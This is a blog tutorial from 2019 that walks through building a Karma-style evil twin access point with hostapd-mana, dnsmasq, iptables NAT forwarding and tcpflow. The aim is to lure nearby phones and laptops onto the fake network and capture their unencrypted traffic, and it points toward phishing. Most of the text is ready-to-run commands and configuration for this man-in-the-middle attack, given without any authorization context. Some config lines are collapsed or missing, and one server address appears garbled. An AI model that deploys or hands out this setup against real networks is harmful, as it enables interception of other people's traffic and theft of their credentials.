by hash3liZer . 05 June 2019
Karma refers to a set of patches and the modifications done in order to get our wireless access point respond to every single one of the probe request frames. These are the wireless packets sent by devices like mobile phones and laptops in order to find the available Access Points.
Devices usually seek to connect known access points if they are found in range. And how it detects an Access Point is by sending and receiving probe frames.
Here, in this scenario a karma is employed so that our rogue/fake access point could respond to all of the probe request frames regardless of the requested access point. Further, the task can be more surfaced by sending some of the usually named access point like a company name to draw in more traffic quickly.
However, some devices go for the encryption offered by the AP before associating with them. Some would likely to auto-connect while some will drop the connection quickly after the encryption gets mismatched.
Hostapd Mana is an updated version of the orignal hostapd with much more functionality to base a perfect Rogue Access Point. We could use this toolkit for a number of recon purposes like logging the probe activity, and setup a karma attack.
If you happen to be running Kali or Parrot, you can directly install the mana-toolkit using the package manager:
$ apt update
$ apt install mana-toolkit dnsmasq
Make sure you install dnsmasq even if you are not installing mana-toolkit from the package manager.
If that's not the case, or you want to grab it directly from the sources, you could follow the instructions for the normal hostapd. Install the dependencies and compile the source from github:
$ apt install build-essential libssl-dev libnl-genl-3-dev
$ git clone https://github.com/sensepost/hostapd-mana
$ cd hostapd-mana/
$ make -C hostapd
$ make install
After installation, you will have the hostapd & hostapd_cli binaries under:
And you could verify the installation by checking the script version:
$ /usr/lib/mana-toolkit/hostapd -v
Finally, make the link for both binaries to our execution directory. So, that we won't have to travel through directories each time to acess our tool:
$ ln -s /usr/lib/mana-toolkit/hostapd /usr/bin/mana-hostapd
$ ln -s /usr/lib/mana-toolkit/hostapd_cli /usr/bin/mana_hostapd_cli
Let's host our Evil Twin Access Point. Since Mana is an extended version of the orignal hostapd, we could base our simple configuration here as well. Let's stretch the config for the evil twin:
$ nano hostapd.conf
interface=wlan1mon driver=nl80211 ssid=[Fake AP Name] hw_mode=g channel=[Fake AP Channel]
The line enable_mana is what activates the karma attack. This is the default karma mode in which when the presence of an access point is requested globally, the device who requested that AP will receive a frame from the evil twin indicating that he is the access point the device is looking for.
The other mode is regarded as loud mode. Here upon a broadcast probe request frame, every device will receive a probe response frame from the evil twin. This could flood the network list with non-existent access points. However, if you are still eager for the loud mode, you can add this line:
Note the args:
Finally, launch the Fake Access Point:
$ mana-hostapd hostapd.conf
Next, we need the DHCP server to wrap our access point with a network. This is what allows the devices to connect & communicate each other. Now, prepare a simple configuration file for dnsmasq:
$ nano dnsmasq.conf
interface=wlan1mon dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h dhcp-option=3,192.168.1.1 dhcp-option=6,192.168.1.1 server=184.108.40.206 log-queries log-dhcp listen-address=127.0.0.1
Fire up DHCP:
$ dnsmasq -C dnsmasq.conf -d
And don't forget to execute these two commands. It will setup the required network along with the ip for our monitor interface wlan1mon.
$ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
$ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
To perform an extensive MITM attack, let's setup the internet connection. To provide the Evil Twin users with internet facility, we need another wired or wireless interface connected to Internet.
Supposing, we have a connection at wlan0, forward the internet traffic from this interface to the monitor interface:
$ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE $ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT
Note the highlighted parameters:
Finally, allow traffic forwarding rules:
$ echo 1 > /proc/sys/net/ipv4/ip_forward
I am not diving deep into how to setup a phishing site with evil twin here. You can have a read for this here in this tutorial:
For MITM, we have a couple of choices. Let's fire tcpflow to capture the data being flowed in the network. We can capture traffic with a couple of factors in consideration. One thing, the traffic through port 443 would be encoded and we can't directly decode it. So, a website using HTTPS is likely to be protected from MITM.
$ tcpflow -i any -C -g port 80
Note the args:
We have done all of our configuration here. However, we must verify it whether our attack vector was successful or not. For this we would have to analyze the wireless traffic. Fire up wireshark and add the below filter to the filter bar:
wlan.fc.subtype eq 5
It will only display probe response frames. If you see probe response frames from the evil twin address with a different ESSID than we have chosen in the hostapd configuration, it means that the evil twin karma access point is successfuly setup.
We can draw in more devices to our access point by forging mainstream beacon & probe response frames. While this task could be quite complicated if tried to done through manual configuration. Hostapd-mana brings us an extensive updated interface of hostapd which can be used for a number of purposes.